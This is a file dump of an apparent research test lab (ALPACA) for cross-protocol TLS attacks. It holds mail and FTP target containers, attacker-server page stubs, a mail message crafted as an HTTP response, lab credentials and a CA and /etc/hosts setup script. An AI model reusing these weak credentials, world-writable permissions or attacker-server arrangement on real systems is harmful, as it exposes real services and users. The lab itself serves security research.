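log_ftp_protocol=YES
# docker-compose.yml passes REVERSE_LOOKUP_ENABLE=NO; if the image's start-up
# script appends that setting, it overrides the value below at run time.
reverse_lookup_enable=YES
-------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/Dockerfile: --------------------------------------------------------------------------------
# Courier IMAP4/POP3/Authdaemon-MySQL
# NOTE(review): debian:latest is unpinned, so a rebuild may pull a different
# release and package set; pin a tag (or digest) for a reproducible lab.
FROM debian:latest

RUN mkdir -p /var/run/courier/authdaemon/ && touch /var/run/courier/authdaemon/pid.lock
RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y courier-imap courier-pop courier-authlib-mysql courier-mta gamin rsyslog
RUN mkdir /var/log/courier/
# Left as found: something in the courier tooling apparently expects mkdir
# under /usr/bin on this base image.
RUN ln -s /bin/mkdir /usr/bin/mkdir
# Lab test account; the fixed password is also published in docker-compose.yml.
RUN useradd bob -d /home/bob
RUN echo bob:12345 | chpasswd
RUN mkdir /home/bob/
RUN maildirmake /home/bob/Maildir
# COPY instead of ADD: identical for plain local files.
COPY mail.eml /home/bob/Maildir/cur/1602771604.M265899P242V0000000000000036I00000000001A0657_0.f178b3e21560,S=851^%2,S
# NOTE(review): world-writable is broader than courier needs once the tree is
# owned by bob (700 should do); left unchanged pending a test against this
# courier build.
RUN chmod -R 777 /home/bob/Maildir
RUN chown -R bob:bob /home/bob
EXPOSE 110/tcp 143/tcp
COPY entrypoint.sh /usr/local/bin/entrypoint.sh
ENTRYPOINT ["/usr/local/bin/entrypoint.sh"]
-------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/entrypoint.sh: --------------------------------------------------------------------------------
#!/bin/sh
# Assemble courier's PEM (private key first, then certificate) from the
# read-only lab cert mount, start the auth daemon and the POP3/IMAP services,
# then drop into a shell to keep the container alive (compose sets tty: true).
#
# Fail fast if the certificate material is missing; the service start-ups
# below are best-effort as before.
set -e
cat /opt/ssl/target.com.key /opt/ssl/target.com.crt > /etc/courier/pop3d.pem
# The PEM contains the private key: readable by the courier user only (no
# execute bit needed, hence 600 rather than the original 700).
chmod 600 /etc/courier/pop3d.pem
chown courier /etc/courier/pop3d.pem
# -p keeps mode and owner; a plain cp left imapd.pem world-readable (0644).
cp -p /etc/courier/pop3d.pem /etc/courier/imapd.pem
set +e
/usr/lib/courier/courier-authlib/authdaemond &
/sbin/rpcbind -w &
/usr/sbin/famd -T 0
service rsyslog start
service courier-pop start
service courier-pop-ssl start
service courier-imap start
service courier-imap-ssl start
bash
-------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/mail.eml: --------------------------------------------------------------------------------
X-Mozilla-Keys:
X-Mozilla-Keys:
To: test
From: test
Subject: test
Message-ID: <3a7aa2bf-8cc6-e671-72f8-0ad2cd79b989@target.com>
Date: Thu, 15 Oct 2020 16:06:18 +0200
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
 attachmentreminder=0; deliveryformat=4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101
 Thunderbird/78.3.2
MIME-Version: 1.0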
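Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit


-------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/Dockerfile: --------------------------------------------------------------------------------
# Cyrus IMAP target for the lab.
# NOTE(review): linagora/cyrus-imap:latest is unpinned; pin a tag or digest
# (as ftp-vsftp does) so rebuilds stay reproducible.
FROM linagora/cyrus-imap:latest

RUN apt-get update && apt-get install -y rsyslog

# COPY instead of ADD: identical for plain local files.
COPY cyrus.conf /etc/cyrus.conf
COPY imapd.conf /etc/imapd.conf

# Seed bob's mailbox with the prepared message (mails/1.eml is shaped like an
# HTTP response; presumably the IMAP download/reflection demo relies on that)
# and give the spool back to the cyrus user.
COPY mails/1.eml /var/spool/cyrus/mail/b/user/bob/1.
RUN chown -R cyrus:mail /var/spool/cyrus/mail/b/user/bob/

COPY cyradm_commands /tmp/cyradm_commands
# No effect at run time: a service started in a RUN step does not survive the
# build layer.  rsyslog has to be started by the container's entrypoint/CMD.
RUN service rsyslog start

# Create and reconstruct user.bob.  The fixed 1s sleep races the master
# start-up, and the admin password on the command line ends up in the image
# metadata (`docker history`) -- tolerable only because cyrus:cyrus is a
# lab-only credential (see below).
RUN /usr/sbin/cyrmaster & \
    sleep 1;\
    export TERM=xterm;cyradm -u cyrus -w cyrus localhost < /tmp/cyradm_commands

# CMD bash
# Admin: cyrus:cyrus
# User: bob:bob alice:alice
-------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/cyradm_commands: --------------------------------------------------------------------------------
cm user.bob
reconstruct user.bob
-------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/cyrus.conf: --------------------------------------------------------------------------------
# Debian defaults for Cyrus IMAP server/cluster implementation
# see cyrus.conf(5) for more information
#
# All the tcp services are tcpd-wrapped. see hosts_access(5)

START {
	# do not delete this entry!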
8 | recover cmd="/usr/sbin/cyrus ctl_cyrusdb -r" 9 | 10 | # this is only necessary if idlemethod is set to "idled" in imapd.conf 11 | #idled cmd="idled" 12 | 13 | # this is useful on backend nodes of a Murder cluster 14 | # it causes the backend to syncronize its mailbox list with 15 | # the mupdate master upon startup 16 | #mupdatepush cmd="/usr/sbin/cyrus ctl_mboxlist -m" 17 | 18 | # this is recommended if using duplicate delivery suppression 19 | delprune cmd="/usr/sbin/cyrus expire -E 3" 20 | # this is recommended if caching TLS sessions 21 | tlsprune cmd="/usr/sbin/cyrus tls_prune" 22 | } 23 | 24 | # UNIX sockets start with a slash and are absolute paths 25 | # you can use a maxchild=# to limit the maximum number of forks of a service 26 | # you can use babysit=true and maxforkrate=# to keep tight tabs on the service 27 | # most services also accept -U (limit number of reuses) and -T (timeout) 28 | SERVICES { 29 | # --- Normal cyrus spool, or Murder backends --- 30 | # add or remove based on preferences 31 | imap cmd="imapd -U 30" listen="imap" prefork=0 maxchild=100 32 | imaps cmd="imapd -s -U 30" listen="imaps" prefork=0 maxchild=100 33 | pop3 cmd="pop3d -U 30" listen="pop3" prefork=0 maxchild=50 34 | pop3s cmd="pop3d -s -U 30" listen="pop3s" prefork=0 maxchild=50 35 | #nntp cmd="nntpd -U 30" listen="nntp" prefork=0 maxchild=100 36 | #nntps cmd="nntpd -s -U 30" listen="nntps" prefork=0 maxchild=100 37 | #http cmd="httpd -U 30" listen="8008" prefork=0 maxchild=100 38 | #https cmd="httpd -s -U 30" listen="8443" prefork=0 maxchild=100 39 | 40 | 41 | # At least one form of LMTP is required for delivery 42 | # (you must keep the Unix socket name in sync with imap.conf) 43 | #lmtp cmd="lmtpd" listen="localhost:lmtp" prefork=0 maxchild=20 44 | lmtpunix cmd="lmtpd" listen="/var/run/cyrus/socket/lmtp" prefork=0 maxchild=20 45 | # ---------------------------------------------- 46 | 47 | # useful if you need to give users remote access to sieve 48 | # by default, we 
limit this to localhost in Debian 49 | sieve cmd="timsieved" listen="localhost:sieve" prefork=0 maxchild=100 50 | 51 | # this one is needed for the notification services 52 | notify cmd="notifyd" listen="/var/run/cyrus/socket/notify" proto="udp" prefork=1 53 | 54 | # --- Murder frontends ------------------------- 55 | # enable these and disable the matching services above, 56 | # except for sieve (which deals automatically with Murder) 57 | 58 | # mupdate database service - must prefork at least 1 59 | # (mupdate slaves) 60 | #mupdate cmd="mupdate" listen=3905 prefork=1 61 | # (mupdate master, only one in the entire cluster) 62 | #mupdate cmd="mupdate -m" listen=3905 prefork=1 63 | 64 | # proxies that will connect to the backends 65 | #imap cmd="proxyd" listen="imap" prefork=0 maxchild=100 66 | #imaps cmd="proxyd -s" listen="imaps" prefork=0 maxchild=100 67 | #pop3 cmd="pop3proxyd" listen="pop3" prefork=0 maxchild=50 68 | #pop3s cmd="pop3proxyd -s" listen="pop3s" prefork=0 maxchild=50 69 | #lmtp cmd="lmtpproxyd" listen="lmtp" prefork=1 maxchild=20 70 | # ---------------------------------------------- 71 | } 72 | 73 | EVENTS { 74 | # this is required 75 | checkpoint cmd="/usr/sbin/cyrus ctl_cyrusdb -c" period=30 76 | 77 | # this is only necessary if using duplicate delivery suppression 78 | delprune cmd="/usr/sbin/cyrus expire -E 3" at=0401 79 | 80 | # this is only necessary if caching TLS sessions 81 | tlsprune cmd="/usr/sbin/cyrus tls_prune" at=0401 82 | 83 | # indexing of mailboxes for server side fulltext searches 84 | 85 | # reindex changed mailboxes (fulltext) approximately every other hour 86 | #squatter_1 cmd="/usr/bin/nice -n 19 /usr/sbin/cyrus squatter -s" period=120 87 | 88 | # reindex all mailboxes (fulltext) daily 89 | #squatter_a cmd="/usr/sbin/cyrus squatter" at=0517 90 | } -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/mails/1.eml: 
-------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Server: Apache/1.3 3 | Content-type: text/html, text, plain 4 | Content-length: 78 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 |

13 | 14 |

15 | 16 | 17 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/mails/2.eml: -------------------------------------------------------------------------------- 1 | X-Identity-Key: id1 2 | X-Account-Key: account1 3 | To: test 4 | From: test 5 | Subject: test 6 | Message-ID: <513fdb5e-6b6a-b208-8902-5dc0f6814e24@test> 7 | Date: Wed, 11 Sep 2019 10:27:01 +0200 8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) 9 | Gecko/20100101 Thunderbird/68.0 10 | MIME-Version: 1.0 11 | Content-Type: text/html; charset=utf-8 12 | Content-Language: en-GB 13 | Content-Transfer-Encoding: 7bit 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |

22 | 23 |

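-------------------------------------------------------------------------------- /testlab/servers/files/mail-sendmail/Dockerfile: --------------------------------------------------------------------------------
# Sendmail STARTTLS target for the lab.
# NOTE(review): debian:latest is unpinned and the sendmail packages come from
# the *experimental* suite, so rebuilds are neither reproducible nor built
# from released packages.  Pin the base image and record why experimental is
# needed (presumably a newer sendmail than stable ships).
FROM debian:latest

RUN echo "deb http://ftp.debian.org/debian experimental main contrib non-free" >> /etc/apt/sources.list

RUN apt-get update && apt-get install -y openssl sendmail
RUN apt-get update && apt-get install -y -t experimental sendmail sendmail-bin sendmail-base sendmail-cf

# COPY instead of ADD: identical for plain local files.
COPY entrypoint.sh /opt/entrypoint.sh
RUN chmod +x /opt/entrypoint.sh

RUN echo "target.com" > /etc/hostname
RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/sendmail.mc
RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/submit.mc

# Lab CA and target.com leaf; entrypoint.sh copies them to /opt/certs.
RUN echo "define(\`confCACERT_PATH', \`/opt/certs/')dnl" >> /etc/mail/sendmail.mc
RUN echo "define(\`confSERVER_CERT', \`/opt/certs/target.com.crt')dnl" >> /etc/mail/sendmail.mc
RUN echo "define(\`confSERVER_KEY', \`/opt/certs/target.com.key')dnl" >> /etc/mail/sendmail.mc
RUN echo "define(\`confCLIENT_CERT', \`/opt/certs/target.com.crt')dnl" >> /etc/mail/sendmail.mc
RUN echo "define(\`confCLIENT_KEY', \`/opt/certs/target.com.key')dnl" >> /etc/mail/sendmail.mc
# Verbose logging so the STARTTLS exchange shows up in syslog.
RUN echo "define(\`confLOG_LEVEL', \`14')" >> /etc/mail/sendmail.mc

# Debian's default sendmail.mc listens on loopback only; rewrite it to all
# container interfaces so the published 0.0.0.0:25 (docker-compose.yml) works.
RUN sed -i 's/127.0.0.1/0.0.0.0/' /etc/mail/sendmail.mc

RUN apt-get update && apt-get install -y nano netcat rsyslog

# Exec form: the script itself becomes PID 1 instead of a wrapping `sh -c`,
# so docker stop's SIGTERM reaches it.  entrypoint.sh carries a shebang for
# this (exec form cannot run a shebang-less script).
ENTRYPOINT ["/opt/entrypoint.sh"]
-------------------------------------------------------------------------------- /testlab/servers/files/mail-sendmail/entrypoint.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Copy the lab certificates out of the read-only mount (presumably so their
# ownership/permissions can be fixed up for sendmail -- see chmod below),
# start syslog and sendmail, then keep the container alive with an
# interactive shell (docker-compose sets tty: true).
cp -r /tmp/certs/ /opt/certs
# The directory holds the private key: owner-only access.
chmod -R 700 /opt/certs
service rsyslog start
service sendmail start
bash
--------------------------------------------------------------------------------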
/testlab/servers/files/nginx-attacker/html/download/ftps.html: -------------------------------------------------------------------------------- 1 | 18 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/download/imap.html: -------------------------------------------------------------------------------- 1 |
9 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Attacker Server 6 | 7 | 8 |







FTPS


Upload


Download


POPS


Download


IMAPS


Upload


Upload

17 | 18 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/reflection/imap.html: -------------------------------------------------------------------------------- 1 |
9 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/reflection/smtp.html: -------------------------------------------------------------------------------- 1 |
-------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/upload/ftps.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/upload/imaps.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 23 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-target/html/index.php: -------------------------------------------------------------------------------- 1 | '/', 4 | 'domain' => $_SERVER['HTTP_HOST'], 5 | 'secure' => true, 6 | 'httponly' => true, 7 | ]); 8 | 9 | session_start(); 10 | ?> 11 |

Very Important Page!

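In the background a cookie was set with session_id for target.com
-------------------------------------------------------------------------------- /testlab/setup.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
#
# One-shot host set-up for the ALPACA test lab: builds/pulls the docker
# images, adds a second loopback address (127.0.0.2 = target.com), generates
# a throw-away CA plus attacker.com/target.com server certificates with
# easy-rsa, and maps both names in /etc/hosts.
#
# Must be run as root (ip/ifconfig, apt-get, /etc/hosts).  Everything it
# produces is test material: the CA and leaf *private keys* land unencrypted
# in servers/files/cert/ and are bind-mounted into the lab containers.  Never
# add the generated CA to a real trust store (the block that did so below is
# intentionally left commented out), and never run the lab on a machine that
# is reachable from an untrusted network -- its services bind to 0.0.0.0.
set -euo pipefail

# Resolve the testlab directory from the script's own location.  The original
# concatenated `pwd` with `dirname "$0"`, which yields a bogus path whenever
# the script is invoked by absolute path (sudo bash /opt/alpaca/testlab/setup.sh).
DIR="$(cd "$(dirname "$0")" && pwd)"
GREEN="\033[0;32m"
NC="\033[0m"

cat << "EOF"
    _    _     ____    _     ____    _
   / \  | |   |  _ \  / \   / ___|  / \
  / _ \ | |   | |_) |/ _ \ | |     / _ \
 / ___ \| |___|  __// ___ \| |___ / ___ \
/_/   \_\_____||_| /_/   \_\\____|/_/   \_\

USE WITH CAUTION!

EOF

OS="$(uname)"

echo -e "${GREEN}Building docker images (THIS WILL TAKE A WHILE!)${NC}"
docker-compose -f "$DIR/servers/docker-compose.yml" build --pull -q
# Best-effort, as before: the locally built alpaca-* images are not in any
# registry, so pull reports errors for them.
docker-compose -f "$DIR/servers/docker-compose.yml" pull -q 2> /dev/null || true

echo -e "${GREEN}Adding additional loopback IP${NC}"
# Idempotent so that re-running the script does not abort here.  On Linux
# every 127/8 address already answers on lo, so the alias is effectively a
# no-op there; macOS needs it.
if [ "$OS" = "Darwin" ]; then
  ifconfig lo0 | grep -q "127.0.0.2" || ifconfig lo0 alias 127.0.0.2/8 up
else
  ip addr show dev lo | grep -q "127.0.0.2/8" || ip addr add 127.0.0.2/8 dev lo
fi

echo -e "${GREEN}Installing dependencies${NC}"

if [ "$OS" = "Darwin" ]; then
  # Some brew versions exit non-zero for an already-installed formula.
  brew install easy-rsa || brew list easy-rsa > /dev/null
else
  apt-get install -y easy-rsa
fi

# Debian/Ubuntu ship the easyrsa wrapper outside PATH; Homebrew puts it in PATH.
path="/usr/share/easy-rsa/"
if [ "$OS" = "Darwin" ]; then
  path=""
  # The original copied the issued certificates from here on macOS.
  PKI_DIR="/usr/local/etc/pki"
else
  PKI_DIR="$DIR/pki"
fi

echo -e "${GREEN}[CERT] Creating PKI${NC}"
# easy-rsa honours EASYRSA_PKI from the environment, so every command below
# uses $PKI_DIR.  The original passed `--pki-dir = DIR` with spaces, which
# easyrsa does not parse as an option, so the PKI silently ended up in the
# current working directory and the script only worked when run from
# testlab/.  EASYRSA_BATCH=1 is exported up-front because init-pki runs
# before the vars file (which also sets it) exists.
export EASYRSA_PKI="$PKI_DIR"
export EASYRSA_BATCH=1
"${path}easyrsa" init-pki
cat << EOF > "$PKI_DIR/vars"
set_var EASYRSA_DN "cn_only"
set_var EASYRSA_DIGEST "sha512"
set_var EASYRSA_BATCH "1"
set_var EASYRSA_REQ_CN "alpaca.poc"
EOF
dd if=/dev/urandom of="$PKI_DIR/.rnd" bs=256 count=1 2> /dev/null
echo -e "${GREEN}[CERT] Build CA${NC}"
"${path}easyrsa" build-ca nopass

# Deliberately disabled: trusting the lab CA system-wide would let anyone
# holding these unencrypted, checked-in keys impersonate any site to this
# machine.  Import the CA into a dedicated test browser profile instead.
#echo -e "${GREEN}[CERT] If you proceed, the generated CA will be added to your trusted CAs. Press any key to proceed${NC}"
#read
#cp "$PKI_DIR/ca.crt" /usr/local/share/ca-certificates/alpaca.crt
#update-ca-certificates

echo -e "${GREEN}[CERT] Generating Certificates${NC}"
"${path}easyrsa" --req-cn="attacker.com" gen-req attacker.com nopass
"${path}easyrsa" sign-req server attacker.com

mkdir -p "$DIR/servers/files/cert/"
cp "$PKI_DIR/issued/attacker.com.crt" "$DIR/servers/files/cert/"
cp "$PKI_DIR/private/attacker.com.key" "$DIR/servers/files/cert/"

"${path}easyrsa" --req-cn="target.com" gen-req target.com nopass
"${path}easyrsa" sign-req server target.com

cp "$PKI_DIR/issued/target.com.crt" "$DIR/servers/files/cert/"
cp "$PKI_DIR/private/target.com.key" "$DIR/servers/files/cert/"

# The original also ran a GNU-only `sed -i` to delete an ALPACA block inside
# this branch, which is a no-op because the branch only runs when no such
# block exists; dropped.
if ! grep -q ALPACA /etc/hosts; then
  echo -e "${GREEN}[HOST] Alter host file${NC}"
  {
    echo "# ALPACA"
    echo "127.0.0.1 attacker.com"
    echo "127.0.0.2 target.com"
    echo "# END ALPACA"
  } >> /etc/hosts
fi
--------------------------------------------------------------------------------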